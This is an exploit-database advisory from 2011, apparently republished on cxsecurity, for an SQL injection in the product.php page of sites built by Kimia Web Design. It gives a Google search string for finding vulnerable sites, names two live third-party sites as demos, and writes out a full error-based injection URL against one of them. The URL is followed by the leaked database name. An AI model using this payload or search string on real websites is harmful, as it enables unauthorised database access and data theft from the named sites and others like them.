Kimia Web Design SQL Injection

2011.05.10
Credit: Inj3ct0r
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

Kimia Web Design <= Remote (product.php) Based SQL Injection 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm KnocKout member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockoutr@msn.com [~] HomePage : http://h4x0resec.blogspot.com - http://griadamlar.com - 1337day.com - http://09exploit.com - http://0nto.me ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : Kimia Web Design |~Price : N/A |~Version : N/A |~Software: http://www.kimia.co.za/index.php |~Vulnerability Style : SQL Injection |~Vulnerability Dir : / |~Google Keyword : Web Design by Kimia inurl:product.php?id= |[~]Date : "26.04.2011" |[~]Tested on : pache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0 PHP/5.2.6-1+lenny10 AND DEMOS. ---------------------------------------------------------- product.php <= 'id' Functions Not Security --------------------------------------------------------- Demos http://www.lapet.co.za/product.php?id=69 http://www.essaygifts.co.za/product.php?id=272 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ =============================================================== |{~~~~~~~~ Explotation| SQL Injection ~~~~~~~~~~}| http://www.lapet.co.za/product.php?id=69 'SQL SHELL' START! example : www.lapet.co.za [~] SQL Injecting(Db Name Get..) http://www.lapet.co.za/product.php?id=69%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20concat%280x7e,0x27,unhex%28hex%28database%28%29%29%29,0x27,0x7e%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1 [~]MysqL Error : Duplicate entry '~'lapete_db1'~1' for key 1 [+]Database Name is found "lapete_db1" to Continue Explotation region Example Based error attack = > http://www.1337day.com/exploits/14509 ================================================================ # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) # Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix * KedAns-Dz # gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n 'www.1337day.com/team' ++ .... .__ _____ _______ | |__ / | |___ __\ _ \_______ ____ | | \ / | |\ \/ / /_\ \_ __ \_/ __ \ | Y \/ ^ /> <\ \_/ \ | \/\ ___/ |___| /\____ |/__/\_ \\_____ /__| \___ > \/ |__| \/ \/ \/ _____________________________ / _____/\_ _____/\_ ___ \ \_____ \ | __)_ / \ \/ / \ | \\ \____ /_______ //_______ / \______ / \/ \/ \/ & HTTP://H4X0RESEC.BLOGSPOT.COM


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top